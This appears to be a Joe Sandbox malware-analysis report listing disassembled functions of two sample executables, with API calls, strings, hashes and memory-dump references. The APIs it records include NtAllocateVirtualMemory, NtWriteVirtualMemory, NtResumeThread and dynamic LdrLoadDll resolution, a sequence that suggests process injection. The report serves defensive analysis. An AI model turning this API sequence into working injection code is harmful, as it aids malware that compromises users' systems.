Opcode Fuzzy Hash: 7cb60aa3ca57c834e55298138eb6fcc60219c6ce3e155163db882c0b84b65934
Instruction Fuzzy Hash: 9841C37A200114EFDB90EF25C845F6AB7A9EF84728F15411EF90587312CB79EC02CBA8

Function 004D03BB Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1797595291.00000000004D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_55ryoipjfdr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d612ec0191f637075e5dd3c2021567e28a03859e370f7c7a2e24b6ec4edea73
Instruction ID: 31f64e078e16c23c75c0016aac51ff5174006e73be8b022303a88c39e4a3253d
Opcode Fuzzy Hash: 2d612ec0191f637075e5dd3c2021567e28a03859e370f7c7a2e24b6ec4edea73
Instruction Fuzzy Hash: 16E0EC31110040CFCB599F10D560754B761FB48329F3489AF98018A392C77AD843DE04

Function 004C03BB Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1797576745.00000000004C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_55ryoipjfdr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d612ec0191f637075e5dd3c2021567e28a03859e370f7c7a2e24b6ec4edea73
Instruction ID: 115fea4dec8eb7a936207d33841ac552b93e08d964ea89f98b2748460457861c
Opcode Fuzzy Hash: 2d612ec0191f637075e5dd3c2021567e28a03859e370f7c7a2e24b6ec4edea73
Instruction Fuzzy Hash: 2EE01235110080CFCB999F10D554B54B771FB4C329F3488AED8018A2A2C77BD943DF04

Function 0040116E Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1797418914.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1797399833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1797439026.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1797470753.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1797485945.0000000000405000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_55ryoipjfdr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73831ec2ff739793e298d5e07f7047441f28691174952ee5d245ad5f7f4e6b47
Instruction ID: fd647da119ca351f97259c219fa55e2f7eca6b9f771cdf8039c6ae643ee10250
Opcode Fuzzy Hash: 73831ec2ff739793e298d5e07f7047441f28691174952ee5d245ad5f7f4e6b47
Instruction Fuzzy Hash: 52D09578311200CFC34ACB08C0A4E00B3B2FB88360B0AC0A5E8088B326C338EC42CE00

Function 00401DA0 Relevance: 6.4, APIs: 2, Strings: 2, Instructions: 352
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040197E: FindResourceW.KERNEL32(?,004030D0,00404010,00000005,00000000,?,?,?,004016C0,00000000,00000000,0000000A,?,?,00000005,00404010), ref: 00401995
Part of subcall function 0040197E: LoadResource.KERNEL32(?,00000000,?,?,?,004016C0,00000000,00000000,0000000A,?,?,00000005,00404010,004030D0), ref: 004019A5
Part of subcall function 0040197E: LockResource.KERNEL32(00000000,?,?,?,004016C0,00000000,00000000,0000000A,?,?,00000005,00404010,004030D0), ref: 004019B0
Part of subcall function 0040197E: SizeofResource.KERNEL32(?,00000000,?,?,?,004016C0,00000000,00000000,0000000A,?,?,00000005,00404010,004030D0), ref: 004019C1

CloseHandle.KERNEL32(?), ref: 00402119
CloseHandle.KERNEL32(?), ref: 00402122

Strings

(, xrefs: 00402053
, xrefs: 00402084

Memory Dump Source

Source File: 00000000.00000002.1797418914.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1797399833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1797439026.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1797470753.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1797485945.0000000000405000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_55ryoipjfdr.jbxd

Similarity

API ID: Resource$CloseHandle$FindLoadLockSizeof
String ID: $(
API String ID: 1682351807-1344310856
Opcode ID: 65a453dfd5797acd4c3d41f45ab134a026913e42f1bed54af7ed45313be9213e
Instruction ID: fc5637a745242155f9a0eda71b2bee8bcc1150329e4d7c6693cfa44899756f19
Opcode Fuzzy Hash: 65a453dfd5797acd4c3d41f45ab134a026913e42f1bed54af7ed45313be9213e
Instruction Fuzzy Hash: 8ED17BB1D0020AABCB10DFE5CA85AAEB7B5FF44304F14453EEA15B72D1D778AA50CB58

Function 004021CF Relevance: 6.0, APIs: 4, Instructions: 18
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000001,00000000,?,?,004012E9,?,00000000), ref: 004021E0
RtlReAllocateHeap.NTDLL(00000000,?,004012E9,?), ref: 004021E7
GetProcessHeap.KERNEL32(00000001,?,?,004012E9,?,00000000), ref: 004021F1
RtlAllocateHeap.NTDLL(00000000,?,004012E9), ref: 004021F8

Memory Dump Source

Source File: 00000000.00000002.1797418914.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1797399833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1797439026.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1797470753.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1797485945.0000000000405000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_55ryoipjfdr.jbxd

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: 239206a3bbee07e605adba3626eef336eeec1ddccb8c5aef048af63f72fbc125
Instruction ID: 99da3122b59a98e68878367fefeeb420ab35424323341d48a4e97cca11a21ddc
Opcode Fuzzy Hash: 239206a3bbee07e605adba3626eef336eeec1ddccb8c5aef048af63f72fbc125
Instruction Fuzzy Hash: BED06272044208FBDF101FD0EE0DB993B6DAB84726F40C025BB0DB54A1C7B591519B69

Analysis Process: 44qxnhoiecq.exePID: 8020, Parent PID: 7708COMMON

Execution Graph

Execution Coverage:	27.6%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	21
Total number of Limit Nodes:	1

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 10001FF0 Relevance: 42.7, APIs: 22, Strings: 2, Instructions: 704nativememoryCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL ref: 10002058
NtAllocateVirtualMemory.NTDLL ref: 100020C2
NtAllocateVirtualMemory.NTDLL ref: 10002144
NtWriteVirtualMemory.NTDLL ref: 100021AC
NtProtectVirtualMemory.NTDLL ref: 10002219
NtAllocateVirtualMemory.NTDLL ref: 100022BF
NtAllocateVirtualMemory.NTDLL ref: 10002307
NtFreeVirtualMemory.NTDLL ref: 1000236D

Strings

0, xrefs: 1000296B
@, xrefs: 100022F3

Memory Dump Source

Source File: 00000003.00000003.2121150163.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000003.2121188246.0000000010004000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000003.2121211972.0000000010005000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000003.2121244000.0000000010006000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000003.2121269427.0000000010000000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_3_10000000_44qxnhoiecq.jbxd

Similarity

API ID: MemoryVirtual$Allocate$FreeProtectWrite
String ID: 0$@
API String ID: 2341880195-1545510068
Opcode ID: f87315e85e7ea5ee04e93949c62e377effce1a32d370792e8fe14f822cac0e62
Instruction ID: 8a67cd01151eb9b4bc0707442a35890dfe94f4f8c30553d2cc09ea552f4a7a1d
Opcode Fuzzy Hash: f87315e85e7ea5ee04e93949c62e377effce1a32d370792e8fe14f822cac0e62
Instruction Fuzzy Hash: 1052B976210B9186EB21CF26E89478E37A5FB48BD8F414216EE8D87B5CDF38C695C740

Function 10001020 Relevance: 35.2, APIs: 2, Strings: 18, Instructions: 190libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(?,?,?,?,?,?,?,?,10001A56), ref: 1000110F
LdrLoadDll.NTDLL ref: 10001160

Strings

ntdll.dll, xrefs: 1000102D
NtAllocateVirtualMemory, xrefs: 10001214
NtDuplicateObject, xrefs: 10001271
NtCreateEvent, xrefs: 10001252
NtWriteVirtualMemory, xrefs: 100012DD
kernel32.dll, xrefs: 100010C7
MultiByteToWideChar, xrefs: 1000117C
NtFreeVirtualMemory, xrefs: 10001233
NtProtectVirtualMemory, xrefs: 100011B7
LdrGetProcedureAddress, xrefs: 100011D6
NtQueryInformationProcess, xrefs: 10001198
NtReadVirtualMemory, xrefs: 100011F5
NtClearEvent, xrefs: 100012C2
LdrLoadDll, xrefs: 10001083
NtResumeThread, xrefs: 1000130C
NtSignalAndWaitForSingleObject, xrefs: 1000128C
NtClose, xrefs: 100012A7
kernelbase.dll, xrefs: 10001120

Memory Dump Source

Source File: 00000003.00000003.2121150163.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000003.2121188246.0000000010004000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000003.2121211972.0000000010005000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000003.2121244000.0000000010006000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000003.2121269427.0000000010000000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_3_10000000_44qxnhoiecq.jbxd

Similarity

API ID: Load
String ID: LdrGetProcedureAddress$LdrLoadDll$MultiByteToWideChar$NtAllocateVirtualMemory$NtClearEvent$NtClose$NtCreateEvent$NtDuplicateObject$NtFreeVirtualMemory$NtProtectVirtualMemory$NtQueryInformationProcess$NtReadVirtualMemory$NtResumeThread$NtSignalAndWaitForSingleObject$NtWriteVirtualMemory$kernel32.dll$kernelbase.dll$ntdll.dll
API String ID: 2234796835-2271829017
Opcode ID: ed3c4db63ad5cc4b42f47faa611067c77233abd1438de0ab5415474ad8deb5a1
Instruction ID: f45f7f1c08eb91b97991e6554cebb749e452b6f3a0b67de9b4da0f7efa5bb01d
Opcode Fuzzy Hash: ed3c4db63ad5cc4b42f47faa611067c77233abd1438de0ab5415474ad8deb5a1
Instruction Fuzzy Hash: AE7138B5201B4182EA06DB15B8513DA63E1FB887C4F86A439FA8D4732CEFBCD596C744

Function 10001AE0 Relevance: 22.7, APIs: 15, Instructions: 226nativeCOMMON

Download Yara Rule

APIs

NtCreateEvent.NTDLL ref: 10001B29
NtCreateEvent.NTDLL ref: 10001B5A
NtClose.NTDLL ref: 10001D92
NtClose.NTDLL ref: 10001D9C
NtDuplicateObject.NTDLL ref: 10001DC9
NtDuplicateObject.NTDLL ref: 10001DFA
NtFreeVirtualMemory.NTDLL ref: 10001E23
NtFreeVirtualMemory.NTDLL ref: 10001E48

Memory Dump Source

Source File: 00000003.00000003.2121150163.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000003.2121188246.0000000010004000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000003.2121211972.0000000010005000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000003.2121244000.0000000010006000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000003.2121269427.0000000010000000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_3_10000000_44qxnhoiecq.jbxd

Similarity

API ID: CloseCreateDuplicateEventFreeMemoryObjectVirtual
String ID:
API String ID: 2195376797-0
Opcode ID: 125e384b1580ac73084a014f6f5d19768dab637254859a7a07da6fbda5995ce6
Instruction ID: ec56d51781d27893633d9c7240a3277deb896bb74b027171511855976fde94cd
Opcode Fuzzy Hash: 125e384b1580ac73084a014f6f5d19768dab637254859a7a07da6fbda5995ce6
Instruction Fuzzy Hash: 5BA14476314B5086E721CF65E89078E33B5FB48BD9F404216EE8D87A58EF79D0A9C780

Function 10003220 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 143nativememoryCOMMON

Download Yara Rule

APIs

NtReadVirtualMemory.NTDLL ref: 10003264
NtAllocateVirtualMemory.NTDLL ref: 100032C6

Strings

H, xrefs: 1000338A
@, xrefs: 100032AF

Memory Dump Source

Source File: 00000003.00000003.2121150163.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000003.2121188246.0000000010004000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000003.2121211972.0000000010005000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000003.2121244000.0000000010006000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000003.2121269427.0000000010000000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_3_10000000_44qxnhoiecq.jbxd

Similarity

API ID: MemoryVirtual$AllocateRead
String ID: @$H
API String ID: 3289415595-104103126
Opcode ID: 45b0df9b2760fa00ff26ba3f8ced848685c82d721b20d44215791ef4f5557619
Instruction ID: dea1a02c564d3dd13500935e78af13ab2823ce8030b56d528f9cdc6a1a59fef7
Opcode Fuzzy Hash: 45b0df9b2760fa00ff26ba3f8ced848685c82d721b20d44215791ef4f5557619
Instruction Fuzzy Hash: E3515672701B818AEB61CF65E480B8E73B9FB48BD8F508116EE9D57A58DF38C15AC740

Function 10003470 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 83nativeCOMMON

Download Yara Rule

APIs

NtReadVirtualMemory.NTDLL ref: 100034A2
NtWriteVirtualMemory.NTDLL ref: 10003534
NtClearEvent.NTDLL ref: 10003554
NtSignalAndWaitForSingleObject.NTDLL ref: 10003568
NtReadVirtualMemory.NTDLL ref: 1000359A

Strings

H, xrefs: 100034C9
H, xrefs: 100035AB
H, xrefs: 10003545

Memory Dump Source

Source File: 00000003.00000003.2121150163.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000003.2121188246.0000000010004000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000003.2121211972.0000000010005000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000003.2121244000.0000000010006000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000003.2121269427.0000000010000000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_3_10000000_44qxnhoiecq.jbxd

Similarity

API ID: MemoryVirtual$Read$ClearEventObjectSignalSingleWaitWrite
String ID: H$H$H
API String ID: 295313806-1989617792
Opcode ID: 3ca87656067ffe8b229c32908ea08fee09abe8ed5b1d66e628708bdb819a434f
Instruction ID: 5021ed8a1ce9b19b5c1717e875882b8ce5ca7f80513f570afed245be05e02f97
Opcode Fuzzy Hash: 3ca87656067ffe8b229c32908ea08fee09abe8ed5b1d66e628708bdb819a434f
Instruction Fuzzy Hash: 3E310A76315B8196EB628F25E94078A73A4F7887D5F405125DF8D83B18EF39C5A9CB00

Function 10002F60 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 172nativememoryCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL ref: 10002FCF
NtAllocateVirtualMemory.NTDLL ref: 1000304E
NtReadVirtualMemory.NTDLL ref: 1000319D
NtFreeVirtualMemory.NTDLL ref: 100031ED

Strings

@, xrefs: 1000302B

Memory Dump Source

Source File: 00000003.00000003.2121150163.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000003.2121188246.0000000010004000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000003.2121211972.0000000010005000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000003.2121244000.0000000010006000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000003.2121269427.0000000010000000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_3_10000000_44qxnhoiecq.jbxd

Similarity

API ID: MemoryVirtual$Allocate$FreeRead
String ID: @
API String ID: 1625299726-2766056989
Opcode ID: 0f366e26a0798a30fde1c151075a89e6975462614e01b7bf4b65f50e877308c2
Instruction ID: 08cac392a7a719ba5502d424389b33665d87b9a1454d0d325e88c27c51f30f16
Opcode Fuzzy Hash: 0f366e26a0798a30fde1c151075a89e6975462614e01b7bf4b65f50e877308c2
Instruction Fuzzy Hash: 1E713776705A809AE712CF61E8507DE77B9F748BCCF008426EE8A97A18DF39C159C740

Function 10002CB0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 151memorynativeCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32 ref: 10002CF3
NtAllocateVirtualMemory.NTDLL ref: 10002D8F

Strings

@, xrefs: 10002D4F

Memory Dump Source

Source File: 00000003.00000003.2121150163.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000003.2121188246.0000000010004000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000003.2121211972.0000000010005000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000003.2121244000.0000000010006000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000003.2121269427.0000000010000000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_3_10000000_44qxnhoiecq.jbxd

Similarity

API ID: AllocateByteCharMemoryMultiVirtualWide
String ID: @
API String ID: 2538853753-2766056989
Opcode ID: 6db13f651ae0562452465d8fcef45ca460b0c7a57652c6155d982de570f98954
Instruction ID: 616015141f86b4411b04d895360121dff96872f804a9fadd55d9b66df03b3043
Opcode Fuzzy Hash: 6db13f651ae0562452465d8fcef45ca460b0c7a57652c6155d982de570f98954
Instruction Fuzzy Hash: 1E610776204B8186E721DF21E89039E77B8F7887D8F504126EE8D87A2CDF79C599CB00

Function 100015F0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL ref: 1000160F
NtReadVirtualMemory.NTDLL ref: 10001644
NtReadVirtualMemory.NTDLL ref: 100016AB
NtReadVirtualMemory.NTDLL ref: 100016F1

Strings

@, xrefs: 100016B5

Memory Dump Source

Source File: 00000003.00000003.2121150163.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000003.2121188246.0000000010004000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000003.2121211972.0000000010005000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000003.2121244000.0000000010006000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000003.2121269427.0000000010000000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_3_10000000_44qxnhoiecq.jbxd

Similarity

API ID: MemoryReadVirtual$InformationProcessQuery
String ID: @
API String ID: 2292840443-2766056989
Opcode ID: 1586ad8fb1f5eced5170f8237ecfd31ce70e54e35ace2cb357b905d546dd4cf7
Instruction ID: 13bcebea3263881b6e9f5070fea06d859024c12457ffc486f15f1268fdda5df8
Opcode Fuzzy Hash: 1586ad8fb1f5eced5170f8237ecfd31ce70e54e35ace2cb357b905d546dd4cf7
Instruction Fuzzy Hash: 9B31D7B2618BD191E7B19B15F8447CEB368F788BC9F854125DB8943A48DF3DC186CB04

Function 007C007E Relevance: 7.6, APIs: 5, Instructions: 127
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 007C05BD: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,007C0093), ref: 007C05CA

VirtualProtect.KERNELBASE(?,?,00000004,?,?), ref: 007C00B3
VirtualProtect.KERNELBASE(?,?,00000002,?,?,?,00000004,?,?), ref: 007C00C3
VirtualProtect.KERNELBASE(?,?,00000004,?,?,?,?,00000000,?,00000000,?,00000002,?,?,?,00000004), ref: 007C010C
VirtualProtect.KERNELBASE(00000004,?,?,?,?,00000000,?,00000000,?,00000002,?,?,?,00000004,?,?), ref: 007C0122
VirtualFree.KERNELBASE(?,00004000,00000002,?,?,?,00000004,?,?), ref: 007C0187

Memory Dump Source

Source File: 00000003.00000002.2122123168.00000000007C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7c0000_44qxnhoiecq.jbxd

Similarity

API ID: Virtual$Protect$AllocFree
String ID:
API String ID: 3729553426-0
Opcode ID: 7cb60aa3ca57c834e55298138eb6fcc60219c6ce3e155163db882c0b84b65934
Instruction ID: 48af2377bb5948aea519b5e428d4869a08d4101c8b87b12b0c6b905ecf04df9c
Opcode Fuzzy Hash: 7cb60aa3ca57c834e55298138eb6fcc60219c6ce3e155163db882c0b84b65934
Instruction Fuzzy Hash: 1D419E72200114EFDB14EF68D889FAAB7A9FF84724B25451DF9059B212C779EC52CBE0

Function 10001920 Relevance: 4.6, APIs: 3, Instructions: 66nativememoryCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL ref: 10001958
NtWriteVirtualMemory.NTDLL ref: 100019AF
NtFreeVirtualMemory.NTDLL ref: 100019F2

Memory Dump Source

Source File: 00000003.00000003.2121150163.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000003.2121188246.0000000010004000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000003.2121211972.0000000010005000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000003.2121244000.0000000010006000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000003.2121269427.0000000010000000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_3_10000000_44qxnhoiecq.jbxd

Similarity

API ID: MemoryVirtual$AllocateFreeWrite
String ID:
API String ID: 2213553877-0
Opcode ID: 99ed4c72808152846b4c4dc95cb12d5b80bf151d319c17aa8236581e06b6da23
Instruction ID: 4be20192d114f57ed866d6a02c79e9e60545017e345fbc303b6d3b3f1d5ba602
Opcode Fuzzy Hash: 99ed4c72808152846b4c4dc95cb12d5b80bf151d319c17aa8236581e06b6da23
Instruction Fuzzy Hash: 3A213872705B8082EB11CF65E85478A77A8F789BD5F584029DF8C87B68DF39C58ACB40

Function 10001A20 Relevance: 3.1, APIs: 2, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000003.2121150163.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000003.2121188246.0000000010004000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000003.2121211972.0000000010005000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000003.2121244000.0000000010006000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000003.2121269427.0000000010000000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_3_10000000_44qxnhoiecq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d10ebd9e48d5dcbf352534e80ccc9bc8cebbc059bbcb083b2fa9c46e13604436
Instruction ID: bc3fb0688c431488aa2819edea9e73b974ef83373d57799a2a78b4a70b7274a1
Opcode Fuzzy Hash: d10ebd9e48d5dcbf352534e80ccc9bc8cebbc059bbcb083b2fa9c46e13604436
Instruction Fuzzy Hash: D5117026304F8182EB11DB24E89139E23A0FB997D4F100024FE8D8736DEF6CC999C750

Function 100017D0 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL ref: 100017EE

Memory Dump Source

Source File: 00000003.00000003.2121150163.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000003.2121188246.0000000010004000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000003.2121211972.0000000010005000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000003.2121244000.0000000010006000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000003.2121269427.0000000010000000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_3_10000000_44qxnhoiecq.jbxd

Similarity

API ID: MemoryVirtualWrite
String ID:
API String ID: 3527976591-0
Opcode ID: d850f230c99a5425dd30eee36a9840c513874e73cb9285ce0d5e71e6250e9977
Instruction ID: 85a4ee6809ba2549589f64f9e1a2927fba021b9ffec7882c337938f7ba2d8dd0
Opcode Fuzzy Hash: d850f230c99a5425dd30eee36a9840c513874e73cb9285ce0d5e71e6250e9977
Instruction Fuzzy Hash: 7BE03072714B8086D7408F1AF58064AB3A8F7887C4F848135FB9D83B18EF78C5A5CB04

Function 10001830 Relevance: 1.5, APIs: 1, Instructions: 20memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL ref: 10001858

Memory Dump Source

Source File: 00000003.00000003.2121150163.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000003.2121188246.0000000010004000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000003.2121211972.0000000010005000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000003.2121244000.0000000010006000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000003.2121269427.0000000010000000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_3_10000000_44qxnhoiecq.jbxd

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: dceb824580b96e71b405478d58ecacf46d89fa57c2bddcfa4af7ef3f192c92e1
Instruction ID: 4d70551202633f4cf27d5d93aec4b253003e6b1c8e1263e06443463bb6e67a25
Opcode Fuzzy Hash: dceb824580b96e71b405478d58ecacf46d89fa57c2bddcfa4af7ef3f192c92e1
Instruction Fuzzy Hash: 31E0C976A18780C6D710DF28E48074ABBB4F79A798FA04015EB8C82A28DB7DC155CF00

Function 100018C0 Relevance: 1.5, APIs: 1, Instructions: 19nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL ref: 100018EA

Memory Dump Source

Source File: 00000003.00000003.2121150163.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000003.2121188246.0000000010004000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000003.2121211972.0000000010005000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000003.2121244000.0000000010006000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000003.2121269427.0000000010000000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_3_10000000_44qxnhoiecq.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: eda178d3c121a3c0246aa1a68712fd338b248a141ea66084485477232ac8b8b6
Instruction ID: 358533fb2e128c2901d80c4f4a4cfb589ac24ede55e7f2f42334dbb3c0a8b6ed
Opcode Fuzzy Hash: eda178d3c121a3c0246aa1a68712fd338b248a141ea66084485477232ac8b8b6
Instruction Fuzzy Hash: 44E0E5B2A24B858ADB01DF54E84078AB7A4F784798F801015E6CC83B28EB7DC25ACB40

Function 007C01C0 Relevance: 3.1, APIs: 2, Instructions: 68
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(?,?,00000004,?,00000000,?,00000000,?,?,?,00000004,?,?), ref: 007C0201
VirtualProtect.KERNELBASE(?,00000000,?,?,?,00000000,?,?,?,00000004,?,?), ref: 007C023A

Memory Dump Source

Source File: 00000003.00000002.2122123168.00000000007C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7c0000_44qxnhoiecq.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: df0d4710188bbc4545ffb25a3de640365ec90d346391f8a801651d14009fcf39
